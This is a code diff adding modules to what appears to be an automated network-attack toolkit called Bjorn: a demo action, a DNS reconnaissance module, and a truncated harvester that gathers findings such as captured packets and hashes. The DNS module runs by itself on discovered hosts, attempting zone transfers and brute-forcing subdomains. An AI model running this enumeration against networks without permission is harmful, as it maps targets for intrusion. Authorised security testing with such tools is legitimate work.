actions/demo_action.py Normal file
View File

@@ -0,0 +1,234 @@
# demo_action.py
# Demonstration Action: wrapped in a DemoAction class
# ---------------------------------------------------------------------------
# Metadata (compatible with sync_actions / Neo launcher)
# ---------------------------------------------------------------------------
b_class = "DemoAction"
b_module = "demo_action"
b_enabled = 1
b_action = "normal" # normal | aggressive | stealth
b_category = "demo"
b_name = "Demo Action"
b_description = "Demonstration action: simply prints the received arguments."
b_author = "Template"
b_version = "0.1.0"
b_icon = "demo_action.png"
b_examples = [
{
"profile": "quick",
"interface": "auto",
"target": "192.168.1.10",
"port": 80,
"protocol": "tcp",
"verbose": True,
"timeout": 30,
"concurrency": 2,
"notes": "Quick HTTP scan"
},
{
"profile": "deep",
"interface": "eth0",
"target": "example.org",
"port": 443,
"protocol": "tcp",
"verbose": False,
"timeout": 120,
"concurrency": 8,
"notes": "Deep TLS profile"
}
]
b_docs_url = "docs/actions/DemoAction.md"
# ---------------------------------------------------------------------------
# UI argument schema
# ---------------------------------------------------------------------------
b_args = {
"profile": {
"type": "select",
"label": "Profile",
"choices": ["quick", "balanced", "deep"],
"default": "balanced",
"help": "Choose a profile: speed vs depth."
},
"interface": {
"type": "select",
"label": "Network Interface",
"choices": [],
"default": "auto",
"help": "'auto' tries to detect the default network interface."
},
"target": {
"type": "text",
"label": "Target (IP/Host)",
"default": "192.168.1.1",
"placeholder": "e.g. 192.168.1.10 or example.org",
"help": "Main target."
},
"port": {
"type": "number",
"label": "Port",
"min": 1,
"max": 65535,
"step": 1,
"default": 80
},
"protocol": {
"type": "select",
"label": "Protocol",
"choices": ["tcp", "udp"],
"default": "tcp"
},
"verbose": {
"type": "checkbox",
"label": "Verbose output",
"default": False
},
"timeout": {
"type": "slider",
"label": "Timeout (seconds)",
"min": 5,
"max": 600,
"step": 5,
"default": 60
},
"concurrency": {
"type": "range",
"label": "Concurrency",
"min": 1,
"max": 32,
"step": 1,
"default": 4,
"help": "Number of parallel tasks (demo only)."
},
"notes": {
"type": "text",
"label": "Notes",
"default": "",
"placeholder": "Free-form comments",
"help": "Free text field to demonstrate a simple string input."
}
}
# ---------------------------------------------------------------------------
# Dynamic detection of interfaces
# ---------------------------------------------------------------------------
import os
try:
import psutil
except Exception:
psutil = None
def _list_net_ifaces() -> list[str]:
names = set()
if psutil:
try:
names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
except Exception:
pass
try:
for n in os.listdir("/sys/class/net"):
if n and n != "lo":
names.add(n)
except Exception:
pass
out = ["auto"] + sorted(names)
seen, unique = set(), []
for x in out:
if x not in seen:
unique.append(x)
seen.add(x)
return unique
def compute_dynamic_b_args(base: dict) -> dict:
d = dict(base or {})
if "interface" in d:
d["interface"]["choices"] = _list_net_ifaces() or ["auto", "eth0", "wlan0"]
if d["interface"].get("default") not in d["interface"]["choices"]:
d["interface"]["default"] = "auto"
return d
# ---------------------------------------------------------------------------
# DemoAction class
# ---------------------------------------------------------------------------
import argparse
class DemoAction:
"""Wrapper called by the orchestrator."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.meta = {
"class": b_class,
"module": b_module,
"enabled": b_enabled,
"action": b_action,
"category": b_category,
"name": b_name,
"description": b_description,
"author": b_author,
"version": b_version,
"icon": b_icon,
"examples": b_examples,
"docs_url": b_docs_url,
"args_schema": b_args,
}
def execute(self, ip=None, port=None, row=None, status_key=None):
"""Called by the orchestrator. This demo only prints arguments."""
self.shared_data.bjorn_orch_status = "DemoAction"
self.shared_data.comment_params = {"ip": ip, "port": port}
print("=== DemoAction :: executed ===")
print(f" IP/Target: {ip}:{port}")
print(f" Row: {row}")
print(f" Status key: {status_key}")
print("No real action performed: demonstration only.")
return "success"
def run(self, argv=None):
"""Standalone CLI mode for testing."""
parser = argparse.ArgumentParser(description=b_description)
parser.add_argument("--profile", choices=b_args["profile"]["choices"],
default=b_args["profile"]["default"])
parser.add_argument("--interface", default=b_args["interface"]["default"])
parser.add_argument("--target", default=b_args["target"]["default"])
parser.add_argument("--port", type=int, default=b_args["port"]["default"])
parser.add_argument("--protocol", choices=b_args["protocol"]["choices"],
default=b_args["protocol"]["default"])
parser.add_argument("--verbose", action="store_true",
default=bool(b_args["verbose"]["default"]))
parser.add_argument("--timeout", type=int, default=b_args["timeout"]["default"])
parser.add_argument("--concurrency", type=int, default=b_args["concurrency"]["default"])
parser.add_argument("--notes", default=b_args["notes"]["default"])
args = parser.parse_args(argv)
print("=== DemoAction :: received parameters ===")
for k, v in vars(args).items():
print(f" {k:11}: {v}")
print("\n=== Demo usage of parameters ===")
if args.verbose:
print("[verbose] Verbose mode enabled → simulated detailed logs...")
if args.profile == "quick":
print("Profile: quick → would perform fast operations.")
elif args.profile == "deep":
print("Profile: deep → would perform longer, more thorough operations.")
else:
print("Profile: balanced → compromise between speed and depth.")
print(f"Target: {args.target}:{args.port}/{args.protocol} via {args.interface}")
print(f"Timeout: {args.timeout} sec, Concurrency: {args.concurrency}")
print("No real action performed: demonstration only.")
if __name__ == "__main__":
DemoAction(shared_data=None).run()

837
actions/dns_pillager.py Normal file
View File

@@ -0,0 +1,837 @@
"""
dns_pillager.py - DNS reconnaissance and enumeration action for Bjorn.
Performs comprehensive DNS intelligence gathering on discovered hosts:
- Reverse DNS lookup on target IP
- Full DNS record enumeration (A, AAAA, MX, NS, TXT, CNAME, SOA, SRV, PTR)
- Zone transfer (AXFR) attempts against discovered nameservers
- Subdomain brute-force enumeration with threading
SQL mode:
- Targets provided by the orchestrator (ip + port)
- IP -> (MAC, hostname) mapping read from DB 'hosts'
- Discovered hostnames are written back to DB hosts table
- Results saved as JSON in data/output/dns/
- Action status recorded in DB.action_results (via DNSPillager.execute)
"""
import os
import json
import socket
import logging
import threading
import time
import datetime
from typing import Dict, List, Optional, Tuple, Set
from concurrent.futures import ThreadPoolExecutor, as_completed
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="dns_pillager.py", level=logging.DEBUG)
# ---------------------------------------------------------------------------
# Graceful import for dnspython (socket fallback if unavailable)
# ---------------------------------------------------------------------------
_HAS_DNSPYTHON = False
try:
import dns.resolver
import dns.zone
import dns.query
import dns.reversename
import dns.rdatatype
import dns.exception
_HAS_DNSPYTHON = True
logger.info("dnspython library loaded successfully.")
except ImportError:
logger.warning(
"dnspython not installed. DNS operations will use socket fallback "
"(limited functionality). Install with: pip install dnspython"
)
# ---------------------------------------------------------------------------
# Action metadata (AST-friendly, consumed by sync_actions / orchestrator)
# ---------------------------------------------------------------------------
b_class = "DNSPillager"
b_module = "dns_pillager"
b_status = "dns_pillager"
b_port = 53
b_service = '["dns"]'
b_trigger = 'on_any:["on_host_alive","on_new_port:53"]'
b_parent = None
b_action = "normal"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 20
b_cooldown = 7200
b_rate_limit = "5/86400"
b_timeout = 300
b_max_retries = 2
b_stealth_level = 7
b_risk_level = "low"
b_enabled = 1
b_tags = ["dns", "recon", "enumeration"]
b_category = "recon"
b_name = "DNS Pillager"
b_description = (
"Comprehensive DNS reconnaissance and enumeration action. "
"Performs reverse DNS, record enumeration (A/AAAA/MX/NS/TXT/CNAME/SOA/SRV/PTR), "
"zone transfer attempts, and subdomain brute-force discovery. "
"Requires: dnspython (pip install dnspython) for full functionality; "
"falls back to socket-based lookups if unavailable."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "DNSPillager.png"
b_args = {
"threads": {
"type": "number",
"label": "Subdomain Threads",
"min": 1,
"max": 50,
"step": 1,
"default": 10,
"help": "Number of threads for subdomain brute-force enumeration."
},
"wordlist": {
"type": "text",
"label": "Subdomain Wordlist",
"default": "",
"placeholder": "/path/to/wordlist.txt",
"help": "Path to a custom subdomain wordlist file. Leave empty for built-in list (~100 entries)."
},
"timeout": {
"type": "number",
"label": "DNS Query Timeout (s)",
"min": 1,
"max": 30,
"step": 1,
"default": 3,
"help": "Timeout in seconds for individual DNS queries."
},
"enable_axfr": {
"type": "checkbox",
"label": "Attempt Zone Transfer (AXFR)",
"default": True,
"help": "Try AXFR zone transfers against discovered nameservers."
},
"enable_subdomains": {
"type": "checkbox",
"label": "Enable Subdomain Brute-Force",
"default": True,
"help": "Enumerate subdomains using wordlist."
},
}
b_examples = [
{"threads": 10, "wordlist": "", "timeout": 3, "enable_axfr": True, "enable_subdomains": True},
{"threads": 5, "wordlist": "/home/bjorn/wordlists/subdomains.txt", "timeout": 5, "enable_axfr": False, "enable_subdomains": True},
]
b_docs_url = "docs/actions/DNSPillager.md"
# ---------------------------------------------------------------------------
# Data directories
# ---------------------------------------------------------------------------
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "dns")
# ---------------------------------------------------------------------------
# Built-in subdomain wordlist (~100 common entries)
# ---------------------------------------------------------------------------
BUILTIN_SUBDOMAINS = [
"www", "mail", "ftp", "localhost", "webmail", "smtp", "pop", "ns1", "ns2",
"ns3", "ns4", "dns", "dns1", "dns2", "mx", "mx1", "mx2", "imap", "pop3",
"blog", "dev", "staging", "test", "testing", "beta", "alpha", "demo",
"admin", "administrator", "panel", "cpanel", "webmin", "portal",
"api", "api2", "api3", "gateway", "gw", "proxy", "cdn", "media",
"static", "assets", "img", "images", "files", "download", "upload",
"vpn", "remote", "ssh", "rdp", "citrix", "owa", "exchange",
"db", "database", "mysql", "postgres", "sql", "mongodb", "redis", "elastic",
"shop", "store", "app", "apps", "mobile", "m",
"intranet", "extranet", "internal", "external", "private", "public",
"cloud", "aws", "azure", "gcp", "s3", "storage",
"git", "gitlab", "github", "svn", "repo", "ci", "cd", "jenkins", "build",
"monitor", "monitoring", "grafana", "prometheus", "kibana", "nagios", "zabbix",
"log", "logs", "syslog", "elk",
"chat", "slack", "teams", "jira", "confluence", "wiki",
"backup", "backups", "bak", "archive",
"secure", "security", "sso", "auth", "login", "oauth",
"docs", "doc", "help", "support", "kb", "status",
"calendar", "crm", "erp", "hr",
"web", "web1", "web2", "server", "server1", "server2",
"host", "node", "worker", "master",
]
# DNS record types to enumerate
DNS_RECORD_TYPES = ["A", "AAAA", "MX", "NS", "TXT", "CNAME", "SOA", "SRV", "PTR"]
class DNSPillager:
"""
DNS reconnaissance action for the Bjorn orchestrator.
Performs reverse DNS, record enumeration, zone transfer attempts,
and subdomain brute-force discovery.
"""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
# IP -> (MAC, hostname) identity cache from DB
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
# DNS resolver setup (dnspython)
self._resolver = None
if _HAS_DNSPYTHON:
self._resolver = dns.resolver.Resolver()
self._resolver.timeout = 3
self._resolver.lifetime = 5
# Ensure output directory exists
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
except Exception as e:
logger.error(f"Failed to create output directory {OUTPUT_DIR}: {e}")
# Thread safety
self._lock = threading.Lock()
logger.info("DNSPillager initialized (dnspython=%s)", _HAS_DNSPYTHON)
# --------------------- Identity cache (hosts) ---------------------
def _refresh_ip_identity_cache(self) -> None:
"""Rebuild IP -> (MAC, current_hostname) from DB.hosts."""
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip_addr in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip_addr] = (mac, current_hn)
def _mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def _hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# --------------------- Public API (Orchestrator) ---------------------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""
Execute DNS reconnaissance on the given target.
Args:
ip: Target IP address
port: Target port (typically 53)
row: Row dict from orchestrator (contains MAC, hostname, etc.)
status_key: Status tracking key
Returns:
'success' | 'failed' | 'interrupted'
"""
self.shared_data.bjorn_orch_status = "DNSPillager"
self.shared_data.bjorn_progress = "0%"
self.shared_data.comment_params = {"ip": ip, "port": str(port), "phase": "init"}
results = {
"target_ip": ip,
"port": str(port),
"timestamp": datetime.datetime.now().isoformat(),
"reverse_dns": None,
"domain": None,
"records": {},
"zone_transfer": {},
"subdomains": [],
"errors": [],
}
try:
# --- Check for early exit ---
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal before start.")
return "interrupted"
mac = row.get("MAC Address") or row.get("mac_address") or self._mac_for_ip(ip) or ""
hostname = (
row.get("Hostname") or row.get("hostname")
or self._hostname_for_ip(ip)
or ""
)
# =========================================================
# Phase 1: Reverse DNS lookup (0% -> 10%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "reverse_dns"}
logger.info(f"[{ip}] Phase 1: Reverse DNS lookup")
reverse_hostname = self._reverse_dns(ip)
if reverse_hostname:
results["reverse_dns"] = reverse_hostname
logger.info(f"[{ip}] Reverse DNS: {reverse_hostname}")
self.shared_data.log_milestone(b_class, "ReverseDNS", f"IP: {ip} -> {reverse_hostname}")
# Update hostname if we found something new
if not hostname or hostname == ip:
hostname = reverse_hostname
else:
logger.info(f"[{ip}] No reverse DNS result.")
self.shared_data.bjorn_progress = "10%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 2: Extract domain and enumerate DNS records (10% -> 35%)
# =========================================================
domain = self._extract_domain(hostname)
results["domain"] = domain
if domain:
self.shared_data.comment_params = {"ip": ip, "phase": "records", "domain": domain}
logger.info(f"[{ip}] Phase 2: DNS record enumeration for {domain}")
self.shared_data.log_milestone(b_class, "EnumerateRecords", f"Domain: {domain}")
record_results = {}
total_types = len(DNS_RECORD_TYPES)
for idx, rtype in enumerate(DNS_RECORD_TYPES):
if self.shared_data.orchestrator_should_exit:
return "interrupted"
records = self._query_records(domain, rtype)
if records:
record_results[rtype] = records
logger.info(f"[{ip}] {rtype} records for {domain}: {records}")
# Progress: 10% -> 35% across record types
pct = 10 + int((idx + 1) / total_types * 25)
self.shared_data.bjorn_progress = f"{pct}%"
results["records"] = record_results
else:
logger.warning(f"[{ip}] No domain could be extracted. Skipping record enumeration.")
self.shared_data.bjorn_progress = "35%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 3: Zone transfer (AXFR) attempt (35% -> 45%)
# =========================================================
self.shared_data.bjorn_progress = "35%"
self.shared_data.comment_params = {"ip": ip, "phase": "zone_transfer", "domain": domain or ip}
if domain and _HAS_DNSPYTHON:
logger.info(f"[{ip}] Phase 3: Zone transfer attempt for {domain}")
nameservers = results["records"].get("NS", [])
# Also try the target IP itself as a nameserver
ns_targets = list(set(nameservers + [ip]))
zone_results = {}
for ns_idx, ns in enumerate(ns_targets):
if self.shared_data.orchestrator_should_exit:
return "interrupted"
axfr_records = self._attempt_zone_transfer(domain, ns)
if axfr_records:
zone_results[ns] = axfr_records
logger.success(f"[{ip}] Zone transfer SUCCESS from {ns}: {len(axfr_records)} records")
self.shared_data.log_milestone(b_class, "AXFRSuccess", f"NS: {ns} | Records: {len(axfr_records)}")
# Progress within 35% -> 45%
if ns_targets:
pct = 35 + int((ns_idx + 1) / len(ns_targets) * 10)
self.shared_data.bjorn_progress = f"{pct}%"
results["zone_transfer"] = zone_results
else:
if not _HAS_DNSPYTHON:
results["errors"].append("Zone transfer skipped: dnspython not available")
elif not domain:
results["errors"].append("Zone transfer skipped: no domain found")
logger.info(f"[{ip}] Skipping zone transfer (dnspython={_HAS_DNSPYTHON}, domain={domain})")
self.shared_data.bjorn_progress = "45%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 4: Subdomain brute-force (45% -> 95%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "subdomains", "domain": domain or ip}
if domain:
logger.info(f"[{ip}] Phase 4: Subdomain brute-force for {domain}")
self.shared_data.log_milestone(b_class, "SubdomainEnum", f"Domain: {domain}")
wordlist = self._load_wordlist()
thread_count = min(10, max(1, len(wordlist)))
discovered = self._enumerate_subdomains(domain, wordlist, thread_count)
results["subdomains"] = discovered
logger.info(f"[{ip}] Subdomain enumeration found {len(discovered)} live subdomains")
else:
logger.info(f"[{ip}] Skipping subdomain enumeration: no domain available")
results["errors"].append("Subdomain enumeration skipped: no domain found")
self.shared_data.bjorn_progress = "95%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 5: Save results and update DB (95% -> 100%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "saving"}
logger.info(f"[{ip}] Phase 5: Saving results")
# Save JSON output
self._save_results(ip, results)
# Update DB hostname if reverse DNS discovered new data
if reverse_hostname and mac:
self._update_db_hostname(mac, ip, reverse_hostname)
self.shared_data.bjorn_progress = "100%"
self.shared_data.log_milestone(b_class, "Complete", f"Records: {sum(len(v) for v in results['records'].values())} | Subdomains: {len(results['subdomains'])}")
# Summary comment
record_count = sum(len(v) for v in results["records"].values())
zone_count = sum(len(v) for v in results["zone_transfer"].values())
sub_count = len(results["subdomains"])
self.shared_data.comment_params = {
"ip": ip,
"domain": domain or "N/A",
"records": str(record_count),
"zones": str(zone_count),
"subdomains": str(sub_count),
}
logger.success(
f"[{ip}] DNS Pillager complete: domain={domain}, "
f"records={record_count}, zone_transfers={zone_count}, subdomains={sub_count}"
)
return "success"
except Exception as e:
logger.error(f"[{ip}] DNSPillager execute failed: {e}")
results["errors"].append(str(e))
# Still try to save partial results
try:
self._save_results(ip, results)
except Exception:
pass
return "failed"
finally:
self.shared_data.bjorn_progress = ""
# --------------------- Reverse DNS ---------------------
def _reverse_dns(self, ip: str) -> Optional[str]:
"""Perform reverse DNS lookup on the IP address."""
# Try dnspython first
if _HAS_DNSPYTHON and self._resolver:
try:
rev_name = dns.reversename.from_address(ip)
answers = self._resolver.resolve(rev_name, "PTR")
for rdata in answers:
hostname = str(rdata).rstrip(".")
if hostname:
return hostname
except Exception as e:
logger.debug(f"dnspython reverse DNS failed for {ip}: {e}")
# Socket fallback
try:
hostname, _, _ = socket.gethostbyaddr(ip)
if hostname and hostname != ip:
return hostname
except (socket.herror, socket.gaierror, OSError) as e:
logger.debug(f"Socket reverse DNS failed for {ip}: {e}")
return None
# --------------------- Domain extraction ---------------------
@staticmethod
def _extract_domain(hostname: str) -> Optional[str]:
"""
Extract the registerable domain from a hostname.
e.g., 'mail.sub.example.com' -> 'example.com'
'host1.internal.lan' -> 'internal.lan'
'192.168.1.1' -> None
"""
if not hostname:
return None
# Skip raw IPs
hostname = hostname.strip().rstrip(".")
parts = hostname.split(".")
if len(parts) < 2:
return None
# Check if it looks like an IP address
try:
socket.inet_aton(hostname)
return None # It's an IP, not a hostname
except (socket.error, OSError):
pass
# For simple TLDs, take the last 2 parts
# For compound TLDs (co.uk, com.au), take the last 3 parts
compound_tlds = {
"co.uk", "co.jp", "co.kr", "co.nz", "co.za", "co.in",
"com.au", "com.br", "com.cn", "com.mx", "com.tw",
"org.uk", "net.au", "ac.uk", "gov.uk",
}
if len(parts) >= 3:
possible_compound = f"{parts[-2]}.{parts[-1]}"
if possible_compound.lower() in compound_tlds:
return ".".join(parts[-3:])
return ".".join(parts[-2:])
# --------------------- DNS record queries ---------------------
def _query_records(self, domain: str, record_type: str) -> List[str]:
"""Query DNS records of a given type for a domain."""
records = []
# Try dnspython first
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(domain, record_type)
for rdata in answers:
value = str(rdata).rstrip(".")
if value:
records.append(value)
return records
except dns.resolver.NXDOMAIN:
logger.debug(f"NXDOMAIN for {domain} {record_type}")
except dns.resolver.NoAnswer:
logger.debug(f"No answer for {domain} {record_type}")
except dns.resolver.NoNameservers:
logger.debug(f"No nameservers for {domain} {record_type}")
except dns.exception.Timeout:
logger.debug(f"Timeout querying {domain} {record_type}")
except Exception as e:
logger.debug(f"dnspython query failed for {domain} {record_type}: {e}")
# Socket fallback (limited to A records only)
if record_type == "A" and not records:
try:
ips = socket.getaddrinfo(domain, None, socket.AF_INET, socket.SOCK_STREAM)
for info in ips:
addr = info[4][0]
if addr and addr not in records:
records.append(addr)
except (socket.gaierror, OSError) as e:
logger.debug(f"Socket fallback failed for {domain} A: {e}")
# Socket fallback for AAAA
if record_type == "AAAA" and not records:
try:
ips = socket.getaddrinfo(domain, None, socket.AF_INET6, socket.SOCK_STREAM)
for info in ips:
addr = info[4][0]
if addr and addr not in records:
records.append(addr)
except (socket.gaierror, OSError) as e:
logger.debug(f"Socket fallback failed for {domain} AAAA: {e}")
return records
# --------------------- Zone transfer (AXFR) ---------------------
def _attempt_zone_transfer(self, domain: str, nameserver: str) -> List[Dict]:
"""
Attempt an AXFR zone transfer from a nameserver.
Returns a list of record dicts on success, empty list on failure.
"""
if not _HAS_DNSPYTHON:
return []
records = []
# Resolve NS hostname to IP if needed
ns_ip = self._resolve_ns_to_ip(nameserver)
if not ns_ip:
logger.debug(f"Cannot resolve NS {nameserver} to IP, skipping AXFR")
return []
try:
zone = dns.zone.from_xfr(
dns.query.xfr(ns_ip, domain, timeout=10, lifetime=30)
)
for name, node in zone.nodes.items():
for rdataset in node.rdatasets:
for rdata in rdataset:
records.append({
"name": str(name),
"type": dns.rdatatype.to_text(rdataset.rdtype),
"ttl": rdataset.ttl,
"value": str(rdata),
})
except dns.exception.FormError:
logger.debug(f"AXFR refused by {nameserver} ({ns_ip}) for {domain}")
except dns.exception.Timeout:
logger.debug(f"AXFR timeout from {nameserver} ({ns_ip}) for {domain}")
except ConnectionError as e:
logger.debug(f"AXFR connection error from {nameserver}: {e}")
except OSError as e:
logger.debug(f"AXFR OS error from {nameserver}: {e}")
except Exception as e:
logger.debug(f"AXFR failed from {nameserver} ({ns_ip}) for {domain}: {e}")
return records
def _resolve_ns_to_ip(self, nameserver: str) -> Optional[str]:
"""Resolve a nameserver hostname to an IP address."""
ns = nameserver.strip().rstrip(".")
# Check if already an IP
try:
socket.inet_aton(ns)
return ns
except (socket.error, OSError):
pass
# Try to resolve
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(ns, "A")
for rdata in answers:
return str(rdata)
except Exception:
pass
# Socket fallback
try:
result = socket.getaddrinfo(ns, 53, socket.AF_INET, socket.SOCK_STREAM)
if result:
return result[0][4][0]
except Exception:
pass
return None
# --------------------- Subdomain enumeration ---------------------
def _load_wordlist(self) -> List[str]:
"""Load subdomain wordlist from file or use built-in list."""
# Check for configured wordlist path
wordlist_path = ""
if hasattr(self.shared_data, "config") and self.shared_data.config:
wordlist_path = self.shared_data.config.get("dns_wordlist", "")
if wordlist_path and os.path.isfile(wordlist_path):
try:
with open(wordlist_path, "r", encoding="utf-8", errors="ignore") as f:
words = [line.strip() for line in f if line.strip() and not line.startswith("#")]
if words:
logger.info(f"Loaded {len(words)} subdomains from {wordlist_path}")
return words
except Exception as e:
logger.error(f"Failed to load wordlist {wordlist_path}: {e}")
logger.info(f"Using built-in subdomain wordlist ({len(BUILTIN_SUBDOMAINS)} entries)")
return list(BUILTIN_SUBDOMAINS)
def _enumerate_subdomains(
self, domain: str, wordlist: List[str], thread_count: int
) -> List[Dict]:
"""
Brute-force subdomain enumeration using ThreadPoolExecutor.
Returns a list of discovered subdomain dicts.
"""
discovered: List[Dict] = []
total = len(wordlist)
if total == 0:
return discovered
completed = [0] # mutable counter for thread-safe progress
def check_subdomain(sub: str) -> Optional[Dict]:
"""Check if a subdomain resolves."""
if self.shared_data.orchestrator_should_exit:
return None
fqdn = f"{sub}.{domain}"
result = None
# Try dnspython
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(fqdn, "A")
ips = [str(rdata) for rdata in answers]
if ips:
result = {
"subdomain": sub,
"fqdn": fqdn,
"ips": ips,
"method": "dns",
}
except Exception:
pass
# Socket fallback
if result is None:
try:
addr_info = socket.getaddrinfo(fqdn, None, socket.AF_INET, socket.SOCK_STREAM)
ips = list(set(info[4][0] for info in addr_info))
if ips:
result = {
"subdomain": sub,
"fqdn": fqdn,
"ips": ips,
"method": "socket",
}
except (socket.gaierror, OSError):
pass
# Update progress atomically
with self._lock:
completed[0] += 1
# Progress: 45% -> 95% across subdomain enumeration
pct = 45 + int((completed[0] / total) * 50)
pct = min(pct, 95)
self.shared_data.bjorn_progress = f"{pct}%"
return result
try:
with ThreadPoolExecutor(max_workers=thread_count) as executor:
futures = {
executor.submit(check_subdomain, sub): sub for sub in wordlist
}
for future in as_completed(futures):
if self.shared_data.orchestrator_should_exit:
# Cancel remaining futures
for f in futures:
f.cancel()
logger.info("Subdomain enumeration interrupted by orchestrator.")
break
try:
result = future.result(timeout=15)
if result:
with self._lock:
discovered.append(result)
logger.info(
f"Subdomain found: {result['fqdn']} -> {result['ips']}"
)
self.shared_data.comment_params = {
"ip": domain,
"phase": "subdomains",
"found": str(len(discovered)),
"last": result["fqdn"],
}
except Exception as e:
logger.debug(f"Subdomain future error: {e}")
except Exception as e:
logger.error(f"Subdomain enumeration thread pool error: {e}")
return discovered
# --------------------- Result saving ---------------------
def _save_results(self, ip: str, results: Dict) -> None:
"""Save DNS reconnaissance results to a JSON file."""
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
safe_ip = ip.replace(":", "_").replace(".", "_")
timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
filename = f"dns_{safe_ip}_{timestamp}.json"
filepath = os.path.join(OUTPUT_DIR, filename)
with open(filepath, "w", encoding="utf-8") as f:
json.dump(results, f, indent=2, default=str)
logger.info(f"Results saved to {filepath}")
except Exception as e:
logger.error(f"Failed to save results for {ip}: {e}")
# --------------------- DB hostname update ---------------------
def _update_db_hostname(self, mac: str, ip: str, new_hostname: str) -> None:
"""Update the hostname in the hosts DB table if we found new DNS data."""
if not mac or not new_hostname:
return
try:
rows = self.shared_data.db.query(
"SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if not rows:
return
existing = rows[0].get("hostnames") or ""
existing_set = set(h.strip() for h in existing.split(";") if h.strip())
if new_hostname not in existing_set:
existing_set.add(new_hostname)
updated = ";".join(sorted(existing_set))
self.shared_data.db.execute(
"UPDATE hosts SET hostnames=? WHERE mac_address=?",
(updated, mac),
)
logger.info(f"Updated DB hostname for MAC {mac}: added {new_hostname}")
# Refresh our local cache
self._refresh_ip_identity_cache()
except Exception as e:
logger.error(f"Failed to update DB hostname for MAC {mac}: {e}")
# ---------------------------------------------------------------------------
# CLI mode (debug / manual execution)
# ---------------------------------------------------------------------------
if __name__ == "__main__":
shared_data = SharedData()
try:
pillager = DNSPillager(shared_data)
logger.info("DNS Pillager module ready (CLI mode).")
rows = shared_data.read_data()
for row in rows:
ip = row.get("IPs") or row.get("ip")
if not ip:
continue
port = row.get("port") or 53
logger.info(f"Execute DNSPillager on {ip}:{port} ...")
status = pillager.execute(ip, str(port), row, "dns_pillager")
if status == "success":
logger.success(f"DNS recon successful for {ip}:{port}.")
elif status == "interrupted":
logger.warning(f"DNS recon interrupted for {ip}:{port}.")
break
else:
logger.failed(f"DNS recon failed for {ip}:{port}.")
logger.info("DNS Pillager CLI execution completed.")
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

165
actions/freya_harvest.py Normal file
View File

@@ -0,0 +1,165 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
freya_harvest.py -- Data collection and intelligence aggregation for BJORN.
Monitors output directories and generates consolidated reports.
"""
import os
import json
import glob
import threading
import time
from datetime import datetime
from collections import defaultdict
from typing import Any, Dict, List, Optional
from logger import Logger
logger = Logger(name="freya_harvest.py")
# -------------------- Action metadata --------------------
b_class = "FreyaHarvest"
b_module = "freya_harvest"
b_status = "freya_harvest"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 50
b_cooldown = 0
b_rate_limit = None
b_timeout = 1800
b_max_retries = 1
b_stealth_level = 10 # Local file processing is stealthy
b_risk_level = "low"
b_enabled = 1
b_tags = ["harvest", "report", "aggregator", "intel"]
b_category = "recon"
b_name = "Freya Harvest"
b_description = "Aggregates findings from all modules into consolidated intelligence reports."
b_author = "Bjorn Team"
b_version = "2.0.4"
b_icon = "FreyaHarvest.png"
b_args = {
"input_dir": {
"type": "text",
"label": "Input Data Dir",
"default": "/home/bjorn/Bjorn/data/output"
},
"output_dir": {
"type": "text",
"label": "Reports Dir",
"default": "/home/bjorn/Bjorn/data/reports"
},
"watch": {
"type": "checkbox",
"label": "Continuous Watch",
"default": True
},
"format": {
"type": "select",
"label": "Report Format",
"choices": ["json", "md", "all"],
"default": "all"
}
}
class FreyaHarvest:
def __init__(self, shared_data):
self.shared_data = shared_data
self.data = defaultdict(list)
self.lock = threading.Lock()
self.last_scan_time = 0
def _collect_data(self, input_dir):
"""Scan directories for JSON findings."""
categories = ['wifi', 'topology', 'webscan', 'packets', 'hashes']
new_findings = 0
for cat in categories:
cat_path = os.path.join(input_dir, cat)
if not os.path.exists(cat_path): continue
for f_path in glob.glob(os.path.join(cat_path, "*.json")):
if os.path.getmtime(f_path) > self.last_scan_time:
try:
with open(f_path, 'r', encoding='utf-8') as f:
finds = json.load(f)
with self.lock:
self.data[cat].append(finds)
new_findings += 1
except: pass
if new_findings > 0:
logger.info(f"FreyaHarvest: Collected {new_findings} new intelligence items.")
